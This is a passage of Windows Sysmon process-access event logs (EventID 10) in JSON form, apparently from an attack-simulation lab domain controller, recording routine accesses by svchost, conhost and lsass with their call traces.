05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4335,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4336,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4337,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4338,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4339,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4340,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4341,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-00106C530600}\r\nSourceProcessId: 4344\r\nSourceThreadId: 644\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-00108D560600}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-00106C530600}","SourceProcessId":"4344","SourceThreadId":"644","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-00108D560600}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4342,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.826\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.826","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 